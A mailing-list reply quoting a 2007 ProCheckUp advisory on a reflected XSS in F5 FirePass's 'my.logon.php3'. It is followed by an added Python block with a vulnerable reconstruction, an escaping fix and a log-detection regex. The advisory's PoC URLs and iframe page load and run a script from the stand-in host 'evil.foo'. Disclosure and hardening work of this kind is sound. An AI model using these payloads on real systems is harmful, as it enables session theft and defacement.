On Fri, Nov 30, 2007 at 12:50 PM, <research (at) procheckup (dot) com [email concealed]> wrote:
PR07-15: Cross-site Scripting (XSS) / HTML injection on F5 FirePass 4100 SSL VPN 'my.logon.php3' server-side script
Date Found: 19th June 2007
Successfully tested on: version 5.5.2
F5 Networks has confirmed the following versions to be vulnerable:
FirePass versions 5.4.1 - 5.5.2
FirePass versions 6.0 - 6.0.1
Description:
F5 Networks FirePass 4100 SSL VPN is vulnerable to XSS within the "my.logon.php3" server-side script.
No authentication is required to exploit this vulnerability.
Consequences:
An attacker may be able to cause execution of malicious scripting code in the browser of a user who visits a specially-crafted URL to an F5 Firepass device, or visits a malicious page that makes a request to such URL. Such code would run within the security context of the target domain.
This type of attack can result in non-persistent defacement of the target site, or the redirection of confidential information (i.e. admin session IDs) to unauthorised third parties.
To exploit this in both Firefox and IE requires an extra character ("=") at the end.
Using the same PoC URL we get:
https://target.tld/my.logon.php3?"></script><textarea>HTML_injection_test</textarea><!--=
Client environment:
firefox 2.0.0.11 and IE 6.0.2900.2180
Ricardo Martins, CISA
Security Consultant
Mobile. +351 933 478 679
Chief Security Officers, S.A.
Ed. Infante D. Henrique
Rua João Chagas, 53 - 1º esq.
Cruz Quebrada
1495-764 Dafundo Portugal
Tel. +351 210 111 616 :: Fax. +351 210 111 618 :: email. info (at) cso (dot) pt [email concealed] :: web. http://www.cso.pt
__________________________________________________________________
On Fri, Nov 30, 2007 at 12:50 PM, <research (at) procheckup (dot) com [email concealed]> wrote:
PR07-15: Cross-site Scripting (XSS) / HTML injection on F5 FirePass 4100 SSL VPN 'my.logon.php3' server-side script
Date Found: 19th June 2007
Successfully tested on: version 5.5.2
F5 Networks has confirmed the following versions to be vulnerable:
FirePass versions 5.4.1 - 5.5.2
FirePass versions 6.0 - 6.0.1
Description:
F5 Networks FirePass 4100 SSL VPN is vulnerable to XSS within the "my.logon.php3" server-side script.
No authentication is required to exploit this vulnerability.
Consequences:
An attacker may be able to cause execution of malicious scripting code in the browser of a user who visits a specially-crafted URL to an F5 Firepass device, or visits a malicious page that makes a request to such URL. Such code would run within the security context of the target domain.
This type of attack can result in non-persistent defacement of the target site, or the redirection of confidential information (i.e. admin session IDs) to unauthorised third parties.
Proof of concept (PoC) URL:
https://target.tld/my.logon.php3?"></script><textarea>HTML_injection_test</textarea><!--
The payload in the example is
"></script><textarea>HTML_injection_test</textarea><!--
which injects a 'textarea' box
The following PoC HTML page would run JavaScript without any restrictions from a third-party file ('http://www.evil.foo/b' in this case):
<html>
<iframe src="https://target.tld/my.logon.php3?%22%3E%3C/script%3E%3Cscript%3Eeval%28name%29%3C/script%3E%3C%21--" width="0%" height="0%" name="xss=document.body.appendChild(document.createElement('script'));xss.setAttribute('src','http://www.evil.foo/b')"></iframe>
</html>
Successfully tested on:
Server environment:
F5 FirePass 4100
Client environment:
Microsoft Internet Explorer 7.0.5730.11
Severity: Medium/High
Author: Richard Brain of ProCheckUp Ltd (www.procheckup.com)
With thanks to Petko D. Petkov for suggesting the eval(name) technique.
References:
http://www.procheckup.com/Vulnerability_2007.php
http://www.f5.com/products/FirePass/
ProCheckUp thanks F5 Networks for working with us.
Fix:
F5 Networks has issued SOL7923:
https://support.f5.com/kb/en-us/solutions/public/7000/900/SOL7923.html?sr=1
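The advisory's PoC payloads work because the query string is reflected, unescaped, into a JavaScript string inside a script block, so a leading `"></script>` closes that block and the rest of the payload is parsed as fresh HTML. The block below is an added illustration written for this post, not ProCheckUp's or F5's code, and it does not reproduce the FirePass script: `render_vulnerable` is a hypothetical reconstruction of the reflection pattern in Python rather than PHP, `render_hardened` shows the fix (emit the value as a JS literal with `<`, `>`, `&` and the line-separator characters unicode-escaped so no closing tag can form), and `is_suspicious_request` is a simple log-line check for requests to `my.logon.php3` whose decoded query carries the tag or `eval(` fragments seen in the two PoC URLs. The payload strings are copied from the advisory; everything else is constructed.

```python
import json
import re
from urllib.parse import unquote, urlsplit

# Payloads taken verbatim from the advisory's PoC URLs (query-string part only).
POC_PLAIN = '"></script><textarea>HTML_injection_test</textarea><!--'
POC_EVAL = unquote('%22%3E%3C/script%3E%3Cscript%3Eeval%28name%29%3C/script%3E%3C%21--')


def render_vulnerable(query: str) -> str:
    """Hypothetical reconstruction of the flaw: raw query text dropped into a
    JS string literal inside a <script> block, with no escaping at all."""
    return '<script>var q="' + query + '";</script>'


def js_string_escape(value: str) -> str:
    """Return a double-quoted JS string literal that can never terminate the
    enclosing <script> element or open a new tag, whatever the input.

    json.dumps gives a valid JS literal (quotes, backslashes, control chars
    escaped); the extra replacements turn the characters that matter to the
    HTML parser into \\uXXXX escapes, which JS decodes back at runtime."""
    literal = json.dumps(value)
    for ch, esc in (('<', '\\u003c'), ('>', '\\u003e'), ('&', '\\u0026'),
                    ('\u2028', '\\u2028'), ('\u2029', '\\u2029')):
        literal = literal.replace(ch, esc)
    return literal


def render_hardened(query: str) -> str:
    """Same reflection, but the value is emitted through js_string_escape."""
    return '<script>var q=' + js_string_escape(query) + ';</script>'


_SCRIPT_CLOSE = re.compile(r'</script', re.IGNORECASE)


def breaks_out_of_script(page: str) -> bool:
    """True if the rendered page contains more than the single legitimate
    closing tag, i.e. the reflected value managed to end the script block."""
    return len(_SCRIPT_CLOSE.findall(page)) > 1


# Fragments that appear in both PoC URLs once the query is percent-decoded.
_SUSPICIOUS = re.compile(r'</?script|eval\s*\(|javascript:', re.IGNORECASE)


def is_suspicious_request(url: str) -> bool:
    """Log-review helper: flag requests to my.logon.php3 whose decoded query
    contains script tags or an eval( call. Decodes twice so a double-encoded
    payload is not missed."""
    parts = urlsplit(url)
    if not parts.path.endswith('my.logon.php3'):
        return False
    decoded = unquote(unquote(parts.query))
    return _SUSPICIOUS.search(decoded) is not None


def demo() -> dict:
    """Constructed comparison of both renderings against the advisory payloads."""
    results = {}
    for label, payload in (('plain', POC_PLAIN), ('eval', POC_EVAL)):
        results[label] = {
            'vulnerable_breaks_out': breaks_out_of_script(render_vulnerable(payload)),
            'hardened_breaks_out': breaks_out_of_script(render_hardened(payload)),
            # The hardened literal still decodes to the original value in JS.
            'roundtrip_ok': json.loads(js_string_escape(payload)) == payload,
        }
    return results


if __name__ == '__main__':
    for label, r in demo().items():
        print(label, r)
    print(is_suspicious_request(
        'https://target.tld/my.logon.php3?%22%3E%3C/script%3E%3Cscript%3Eeval%28name%29%3C/script%3E%3C%21--'))
```

The escaping rule is the general one for any value placed inside a JavaScript string literal in an HTML document: JSON-encode it, then unicode-escape `<`, `>`, `&`, U+2028 and U+2029, because the HTML tokenizer ends a script element at the first `</script` it sees regardless of JavaScript quoting. Plain HTML entity encoding (`&lt;`) is the wrong tool here, since entities are not decoded inside script content.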